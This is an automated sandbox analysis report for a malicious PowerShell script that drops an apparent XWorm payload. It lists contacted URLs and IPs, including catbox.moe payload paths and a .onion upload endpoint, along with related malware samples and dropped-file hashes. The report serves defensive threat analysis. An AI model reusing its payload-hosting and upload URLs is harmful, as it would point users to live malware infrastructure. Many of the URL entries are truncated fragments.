http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.1360704931.00000000059FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1247032360.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1436533880.0000026A5A13C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1436533880.0000026A59F97000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702	lsass.exe, 00000016.00000000.1355628623.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2434653599.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod	Microsoft-Windows-Bits-Client%4Operational.evtx.31.dr	false		high
https://files.catbox.moe/n8	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://i.ibb.co	SVrB5SO0.exe, 0000000F.00000002.2458610263.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, SVrB5SO0.exe, 0000000F.00000002.2458610263.0000000002E5C000.00000004.00000800.00020000.00000000.sdmp, SVrB5SO0.exe, 0000000F.00000002.2458610263.0000000002E2B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000011.00000002.1357130417.0000026A4A14B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/09/policy	lsass.exe, 00000016.00000000.1355628623.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2434653599.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000005.00000002.1243180713.0000000004B46000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000011.00000002.1357130417.0000026A4A14B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000011.00000002.1357130417.0000026A4B45A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com;	powershell.exe, 00000003.00000002.1350767206.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000011.00000002.1436533880.0000026A59F97000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/ertiesP	lsass.exe, 00000016.00000000.1355628623.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2434653599.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://files.catbox.mo	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://files.catbox.moe/cfuoi8.fuk-Path	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000004.00000002.2481787005.0000014F1C80F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://files.catbox.moe/	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://files.catbox.moe/n8nug3.fuckPath	powershell.exe, 00000003.00000002.1350767206.0000000005230000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.blackhost.xyz	powershell.exe, 00000003.00000002.1350767206.0000000005204000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://files.cat	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000011.00000002.1357130417.0000026A4A14B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.blackhost.xyz/srv/fu	powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://files.catbox.moe/n8nug3.f	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdC:	Microsoft-Windows-Bits-Client%4Operational.evtx.31.dr	false		high
https://files.catbox.moe/cfuoi8.fuk$M	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://files.ca	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://files.catbox.moe/n8nu	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro	powershell.exe, 00000003.00000002.1366751494.00000000073F0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/soap12/	lsass.exe, 00000016.00000002.2434653599.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 00000004.00000003.1203397070.0000014F1C772000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000000.1444050439.000001EA19B5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2481275686.000001EA19059000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2514795662.000001EA19B5B000.00000004.00000001.00020000.00000000.sdmp, edb.log.4.dr, Microsoft-Windows-Bits-Client%4Operational.evtx.31.dr	false		high
https://www.blackhost.xyz	powershell.exe, 00000003.00000002.1350767206.0000000005204000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000005.00000002.1243180713.0000000004B46000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1355628623.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2434653599.000002D6CDC2F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://analytics.paste.ee;	powershell.exe, 00000003.00000002.1350767206.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96C:	svchost.exe, 0000001F.00000000.1444050439.000001EA19B5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2481275686.000001EA19059000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2514795662.000001EA19B5B000.00000004.00000001.00020000.00000000.sdmp, Microsoft-Windows-Bits-Client%4Operational.evtx.31.dr	false		high
https://aka.ms/pscore68	powershell.exe, 00000011.00000002.1357130417.0000026A49F21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://files.c	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://blackhost7pws76u6vohksdahnm6adf7riukgcmahrwt43wv2drvyxid.onion/srv/fup/uploads/DRGDF.HGFG	powershell.exe, 00000003.00000002.1350767206.0000000005225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://files.catbox.moe/n8nug3.	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://files.catbox.moe/n	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://files.catbox.moe/n8nug3.fu	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://themes.googleusercontent.com	powershell.exe, 00000003.00000002.1350767206.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1350767206.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://files.catbox.moe/n8nug3.fuc	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://files.catbox.moe	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://files.catbox.moe/n8nug	powershell.exe, 00000003.00000002.1350767206.0000000004DFF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.coqQ	powershell.exe, 00000005.00000002.1254100995.0000000007F1B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.186.113.60	paste.ee	Reserved	49466	KLAYER-GLOBALNL	false
108.181.20.35	files.catbox.moe	Canada	852	ASN852CA	false
2.238.145.99	www.blackhost.xyz	Italy	12874	FASTWEBIT	true
91.134.10.182	unknown	France	16276	OVHFR	false
91.134.82.79	i.ibb.co	France	16276	OVHFR	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1632678
Start date and time:	2025-03-08 18:56:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	26
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	script.ps1
Detection:	MAL
Classification:	mal100.troj.evad.winPS1@22/85@6/6
EGA Information:	Successful, ratio: 64.3%
HCA Information:	Successful, ratio: 99% Number of executed functions: 191 Number of non-executed functions: 210
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): SIHClient.exe, SgrmBroker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.60.203.209, 40.126.31.131, 40.126.31.3, 20.190.159.73, 40.126.31.0, 20.190.159.64, 40.126.31.1, 20.190.159.130, 20.190.159.4, 52.149.20.212, 4.175.87.197
Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, slscr.update.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, www.tm.v4.a.prd.aadg.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, login.live.com, e16604.f.akamaiedge.net, prod.fs.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target SVrB5SO0.exe, PID 7512 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7616 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7836 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8096 because it is empty
Execution Graph export aborted for target svchost.exe, PID 7996 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
12:57:10	API Interceptor	99x Sleep call for process: powershell.exe modified
12:57:12	API Interceptor	2x Sleep call for process: svchost.exe modified
12:57:28	API Interceptor	224973x Sleep call for process: SVrB5SO0.exe modified
12:58:00	API Interceptor	300008x Sleep call for process: winlogon.exe modified
12:58:01	API Interceptor	246974x Sleep call for process: lsass.exe modified
12:58:05	API Interceptor	268106x Sleep call for process: dwm.exe modified
12:58:16	API Interceptor	5x Sleep call for process: WmiPrvSE.exe modified
12:58:16	API Interceptor	53x Sleep call for process: notepad.exe modified
12:58:19	API Interceptor	210x Sleep call for process: dllhost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.186.113.60	nicegirlwanttokissingmylipswithnicely.hta	Get hash	malicious	Remcos	Browse
	awb_post_dhl_delivery_documents_pdf.vbs	Get hash	malicious	XWorm	Browse
	AbHo73IEJ3.exe	Get hash	malicious	AsyncRAT, VenomRAT	Browse
	morninghtaaaafilex.hta	Get hash	malicious	AgentTesla	Browse
	beautifulmomentswithniceplacegive.hta	Get hash	malicious	Remcos	Browse
	greatdaycomingforyourwithbestthingsbetter.hta	Get hash	malicious	Remcos	Browse
	nseemybestgoodthingsonbestwaygivenme.hta	Get hash	malicious	Remcos	Browse
	betterperformancebetterforgivembest.hta	Get hash	malicious	Unknown	Browse
	sightkissgivenmebestfeelingentiretimesgivebeautifulkiss.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse
	zbeautifulmomentswithniceplacegive.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse
108.181.20.35	Document.pdf.lnk	Get hash	malicious	Unknown	Browse	files.catbox.moe/p1yr9i.pdf
108.181.20.35	SecuriteInfo.com.HEUR.Trojan.OLE2.Agent.gen.26943.12401.msi	Get hash	malicious	LummaC Stealer	Browse	files.catbox.moe/nzct1p
91.134.10.182	PjzDuCbFg6.exe	Get hash	malicious	Amadey, DarkTortilla, LummaC Stealer, Poverty Stealer, Vidar, XWorm	Browse
	https://shorten.is/AdsPayments101	Get hash	malicious	HTMLPhisher	Browse
	http://milsted9.github.io/jon/sgndrve.html	Get hash	malicious	HTMLPhisher	Browse
	https://stleemcommnunlty.com/sumitr/revit/dopg	Get hash	malicious	Unknown	Browse
	Letter From the Sheriff - Court Order - LTA3011055 (1).pdf	Get hash	malicious	HTMLPhisher	Browse
	32cv.exe	Get hash	malicious	LummaC	Browse
	http://uphiodloagi.godaddysites.com/	Get hash	malicious	HTMLPhisher	Browse
	SERVED SUMMON LETTER 01-30-2025.pdf	Get hash	malicious	HTMLPhisher	Browse
	https://microsoft-teams-download.burleson-appliance.net/?msclkid=405ba02277c21a93ebbac7ad905a34e1	Get hash	malicious	Unknown	Browse
	https://5065512.pkjn.sa.com/	Get hash	malicious	Unknown	Browse
91.134.82.79	https://graph.org/WBACK-03-06?qb3n	Get hash	malicious	Unknown	Browse
	https://secure.smore.com/n/yzrw37	Get hash	malicious	HTMLPhisher	Browse
	https://tme-web-channel.ru/vikaph77	Get hash	malicious	HTMLPhisher, Telegram Phisher	Browse
	https://we324msnbi.pages.dev/assets/favicons/default/site.webmanifest	Get hash	malicious	HTMLPhisher	Browse
	https://ebukawetransfersverifys.blob.core.windows.net/ebukawetransfersverifys/ebukawetransfersverifys.html?#datenschutz@ensi.ch	Get hash	malicious	HTMLPhisher	Browse
	http://upholldlogin.godaddysites.com/	Get hash	malicious	Unknown	Browse
	https://yuanyuandg.xasc.top/index.html	Get hash	malicious	Unknown	Browse
	https://the9parksvb.com/4737971934	Get hash	malicious	Unknown	Browse
	http://funny-indecisive-wildflower.glitch.me/djgf54jf6.html	Get hash	malicious	HTMLPhisher	Browse
	http://glaze-uneven-woodwind.glitch.me/CaBvU.htm	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
i.ibb.co	https://graph.org/WBACK-03-06?qb3n	Get hash	malicious	Unknown	Browse	91.134.10.168
	SVrB5SO0.exe	Get hash	malicious	XWorm	Browse	108.181.22.211
	https://secure.smore.com/n/yzrw37	Get hash	malicious	HTMLPhisher	Browse	91.134.82.79
	SecuriteInfo.com.Trojan.PackedNET.3242.20044.5428.exe	Get hash	malicious	DarkTortilla, LummaC Stealer	Browse	108.181.22.211
	http://genminiaglosginie.godaddysites.com/	Get hash	malicious	Unknown	Browse	91.134.10.127
	https://sltreanmcommnunlty.com/nurka/kisloy/efotr	Get hash	malicious	Unknown	Browse	91.134.9.160
	https://shorten.is/AdsPayments101	Get hash	malicious	HTMLPhisher	Browse	91.134.10.182
	https://vine-aged-thing.glitch.me/public/NF6ZYO3U0ETRC6UIA5BRREAKTD8CH9OENR.html	Get hash	malicious	HTMLPhisher	Browse	207.174.26.219
	https://infobanssosscairsegeraa.kilixinfor.asia/	Get hash	malicious	Telegram Phisher	Browse	108.181.22.211
	https://tme-web-channel.ru/vikaph77	Get hash	malicious	HTMLPhisher, Telegram Phisher	Browse	108.181.22.211
files.catbox.moe	TagManager.exe	Get hash	malicious	Unknown	Browse	108.181.20.35
	https://drive.usercontent.google.com/u/0/uc?id=1HlAGxpD0Z9EdJFVn9k8S6TIRY_SBpAZ-&export=download	Get hash	malicious	Unknown	Browse	108.181.20.35
	PAYMENT INVOICE.vbs	Get hash	malicious	FormBook	Browse	108.181.20.35
	PAYMENT INVOICE.vbs	Get hash	malicious	FormBook	Browse	108.181.20.35
	PO 536120 - Purchase Order R43500 V5560001.vbs	Get hash	malicious	Remcos	Browse	108.181.20.35
	PO- 20250228246.vbs	Get hash	malicious	FormBook	Browse	108.181.20.35
	Pi 20250226.vbs	Get hash	malicious	FormBook	Browse	108.181.20.35
	PAYMENT DETAILS.vbs	Get hash	malicious	FormBook	Browse	108.181.20.35
	Payment Copy.vbs	Get hash	malicious	FormBook	Browse	108.181.20.35
	PO20250220.Vbs.vbs	Get hash	malicious	FormBook	Browse	108.181.20.35
paste.ee	nicegirlwanttokissingmylipswithnicely.hta	Get hash	malicious	Remcos	Browse	23.186.113.60
	awb_post_dhl_delivery_documents_pdf.vbs	Get hash	malicious	XWorm	Browse	23.186.113.60
	AbHo73IEJ3.exe	Get hash	malicious	AsyncRAT, VenomRAT	Browse	23.186.113.60
	morninghtaaaafilex.hta	Get hash	malicious	AgentTesla	Browse	23.186.113.60
	beautifulmomentswithniceplacegive.hta	Get hash	malicious	Remcos	Browse	23.186.113.60
	greatdaycomingforyourwithbestthingsbetter.hta	Get hash	malicious	Remcos	Browse	23.186.113.60
	nseemybestgoodthingsonbestwaygivenme.hta	Get hash	malicious	Remcos	Browse	23.186.113.60
	betterperformancebetterforgivembest.hta	Get hash	malicious	Unknown	Browse	23.186.113.60
	sightkissgivenmebestfeelingentiretimesgivebeautifulkiss.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	23.186.113.60
	zbeautifulmomentswithniceplacegive.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	23.186.113.60

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OVHFR	Update.Client.exe	Get hash	malicious	Unknown	Browse	51.79.171.167
	Update.Client.exe	Get hash	malicious	Unknown	Browse	51.79.171.167
	mpsl.elf	Get hash	malicious	Mirai	Browse	8.33.207.83
	jklspc.elf	Get hash	malicious	Unknown	Browse	51.83.67.20
	Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Get hash	malicious	LummaC Stealer	Browse	164.132.58.105
	Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Get hash	malicious	LummaC Stealer	Browse	164.132.58.105
	https://www.dottedsign.com/task?code=eyJhbGciOiJIUzUxMiJ9.eyJ0YXNrX2lkIjozNDU1ODM1LCJmaWxlX2lkIjoyMjU3NDQ4Mywic2lnbl9maWxlX2lkIjoyMzE3NTY1OCwic3RhZ2VfaWQiOjQ3MjQ2MTcsImVtYWlsIjoidmZhcmlhc0B3ZXN0bGFrZS5jb20iLCJleHBpcmVkX2F0IjoxNzQxNTUzNDgzfQ.HzZLgMMxAZSV_iVgO--XdcSNVOvVCdiCg8S3aUWMChplsdtgyqOWKyJi3vwVbeBh99sm9EHWsNwj41IZdYNjWA	Get hash	malicious	Unknown	Browse	51.77.64.70
	NEW PURCHASE ORDER.exe	Get hash	malicious	FormBook	Browse	51.222.255.207
	FuYyhSE7Nh.exe	Get hash	malicious	Unknown	Browse	94.23.158.211
	FuYyhSE7Nh.exe	Get hash	malicious	Unknown	Browse	94.23.158.211
ASN852CA	nabarm5.elf	Get hash	malicious	Unknown	Browse	161.187.172.209
	nabarm.elf	Get hash	malicious	Unknown	Browse	75.153.163.133
	1isequal9.mips.elf	Get hash	malicious	Unknown	Browse	75.153.94.155
	1isequal9.m68k.elf	Get hash	malicious	Unknown	Browse	173.182.138.131
	1isequal9.ppc.elf	Get hash	malicious	Unknown	Browse	198.53.45.177
	i686.elf	Get hash	malicious	Mirai	Browse	207.6.176.186
	nabx86.elf	Get hash	malicious	Unknown	Browse	50.92.9.250
	nklmips.elf	Get hash	malicious	Unknown	Browse	75.159.38.48
	jklspc.elf	Get hash	malicious	Unknown	Browse	162.157.2.75
	mips.elf	Get hash	malicious	Unknown	Browse	137.186.136.216
OVHFR	Update.Client.exe	Get hash	malicious	Unknown	Browse	51.79.171.167
	Update.Client.exe	Get hash	malicious	Unknown	Browse	51.79.171.167
	mpsl.elf	Get hash	malicious	Mirai	Browse	8.33.207.83
	jklspc.elf	Get hash	malicious	Unknown	Browse	51.83.67.20
	Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Get hash	malicious	LummaC Stealer	Browse	164.132.58.105
	Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Get hash	malicious	LummaC Stealer	Browse	164.132.58.105
	https://www.dottedsign.com/task?code=eyJhbGciOiJIUzUxMiJ9.eyJ0YXNrX2lkIjozNDU1ODM1LCJmaWxlX2lkIjoyMjU3NDQ4Mywic2lnbl9maWxlX2lkIjoyMzE3NTY1OCwic3RhZ2VfaWQiOjQ3MjQ2MTcsImVtYWlsIjoidmZhcmlhc0B3ZXN0bGFrZS5jb20iLCJleHBpcmVkX2F0IjoxNzQxNTUzNDgzfQ.HzZLgMMxAZSV_iVgO--XdcSNVOvVCdiCg8S3aUWMChplsdtgyqOWKyJi3vwVbeBh99sm9EHWsNwj41IZdYNjWA	Get hash	malicious	Unknown	Browse	51.77.64.70
	NEW PURCHASE ORDER.exe	Get hash	malicious	FormBook	Browse	51.222.255.207
	FuYyhSE7Nh.exe	Get hash	malicious	Unknown	Browse	94.23.158.211
	FuYyhSE7Nh.exe	Get hash	malicious	Unknown	Browse	94.23.158.211
FASTWEBIT	5r3fqt67ew531has4231.ppc.elf	Get hash	malicious	Mirai, Okiru	Browse	93.51.249.145
	nabm68k.elf	Get hash	malicious	Unknown	Browse	93.52.86.124
	jklarm7.elf	Get hash	malicious	Unknown	Browse	93.42.110.141
	jklm68k.elf	Get hash	malicious	Unknown	Browse	2.227.70.59
	aV2ffcSuKl.exe	Get hash	malicious	Amadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, SystemBC, Vidar	Browse	62.101.76.218
	i686.elf	Get hash	malicious	Mirai	Browse	93.56.244.119
	sh4.elf	Get hash	malicious	Unknown	Browse	93.38.40.116
	splppc.elf	Get hash	malicious	Unknown	Browse	93.60.206.177
	nabarm5.elf	Get hash	malicious	Unknown	Browse	93.42.102.92
	x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse	2.235.31.111
KLAYER-GLOBALNL	x86.elf	Get hash	malicious	Mirai	Browse	23.186.92.224
	nicegirlwanttokissingmylipswithnicely.hta	Get hash	malicious	Remcos	Browse	23.186.113.60
	awb_post_dhl_delivery_documents_pdf.vbs	Get hash	malicious	XWorm	Browse	23.186.113.60
	AbHo73IEJ3.exe	Get hash	malicious	AsyncRAT, VenomRAT	Browse	23.186.113.60
	morninghtaaaafilex.hta	Get hash	malicious	AgentTesla	Browse	23.186.113.60
	beautifulmomentswithniceplacegive.hta	Get hash	malicious	Remcos	Browse	23.186.113.60
	greatdaycomingforyourwithbestthingsbetter.hta	Get hash	malicious	Remcos	Browse	23.186.113.60
	nseemybestgoodthingsonbestwaygivenme.hta	Get hash	malicious	Remcos	Browse	23.186.113.60
	betterperformancebetterforgivembest.hta	Get hash	malicious	Unknown	Browse	23.186.113.60
	sightkissgivenmebestfeelingentiretimesgivebeautifulkiss.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	23.186.113.60

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	esFK2gm.exe	Get hash	malicious	Fallen Miner, Xmrig	Browse	23.186.113.60 108.181.20.35 2.238.145.99 91.134.10.182 91.134.82.79
	Setup.exe	Get hash	malicious	Xmrig	Browse	23.186.113.60 108.181.20.35 2.238.145.99 91.134.10.182 91.134.82.79
	Superstar_MemberCard.tiff.exe	Get hash	malicious	Unknown	Browse	23.186.113.60 108.181.20.35 2.238.145.99 91.134.10.182 91.134.82.79
	Superstar_MemberCard.tiff.exe	Get hash	malicious	Unknown	Browse	23.186.113.60 108.181.20.35 2.238.145.99 91.134.10.182 91.134.82.79
	1.exe	Get hash	malicious	Unknown	Browse	23.186.113.60 108.181.20.35 2.238.145.99 91.134.10.182 91.134.82.79
	VirtManage.exe	Get hash	malicious	Unknown	Browse	23.186.113.60 108.181.20.35 2.238.145.99 91.134.10.182 91.134.82.79
	VirtManage.exe	Get hash	malicious	Unknown	Browse	23.186.113.60 108.181.20.35 2.238.145.99 91.134.10.182 91.134.82.79
	VirtManage.exe	Get hash	malicious	Unknown	Browse	23.186.113.60 108.181.20.35 2.238.145.99 91.134.10.182 91.134.82.79
	VirtManage.exe	Get hash	malicious	Unknown	Browse	23.186.113.60 108.181.20.35 2.238.145.99 91.134.10.182 91.134.82.79
	RFQ_PO_98473009.png.exe	Get hash	malicious	MSIL Logger, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	23.186.113.60 108.181.20.35 2.238.145.99 91.134.10.182 91.134.82.79

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3073528368044944
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrz:KooCEYhgYEL0In
MD5:	43EAA58E1425D98F817B3DE096C0801F
SHA1:	8135F36F82AF0B65D3C67BBD2F96203DFB082571
SHA-256:	F4733A13D44B621CCCB2FE81D37AFEB3BACC956475FC6F00A84C1B2EC7977F73
SHA-512:	58E578A71E44A70CBB7211EA9A5D097F56C4DCF94E6C024C62A3DC9C0B374D0519BC8A8071CCDEDF409DC47AE35E73AA3A10308D8B69CEA33F331703552E2C7A
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x03744f18, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.42214607259159986
Encrypted:	false
SSDEEP:	1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
MD5:	4E120BA72FC6B01A79D0BC93073958EF
SHA1:	D9C969E95D3364644D2151AA018A4D664DC92EB7
SHA-256:	92705C12E803454E11733D35E77C5B7E59168D43409AE58596D29BC3D726B87D
SHA-512:	6C0CCA4B93860252093B576110F581C89507CDBB305B2615CFD4FB4F27FE99C1CF201AE1FED78A994FA405F51A96F2DAF48E6797231B166D81E2D4895707F9AD
Malicious:	false
Preview:	.tO.... .......A.......X\...;...{......................0.!..........{A..9...}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................0....9...}.................y..9...}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07723066764839415
Encrypted:	false
SSDEEP:	3:ZWtKYeeFt2ajn13a/g8PnYBallcVO/lnlZMxZNQl:ZWtKzoYa53qg8A0Oewk
MD5:	77EE5A79B8FABF509F28B0A77476B578
SHA1:	B702A032135372F7CB93F985D24BF17D2F5AED34
SHA-256:	9D546A099AE9EF004B74ABC3B7C6F1334382D0D7E2355200A13342621ED1E07C
SHA-512:	614607E8266FD11EA0D152ABD04C7E486A9EAE511926B3AA8F70F7173C02922FF804E1D72F3E9EC10B365A5996FD0947AF6CD5CBEACBFF71D5961AAAF219E7A8
Malicious:	false
Preview:	Ji.(.....................................;...{...9...}.......{A..............{A......{A..........{A]................y..9...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\SVrB5SO0.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
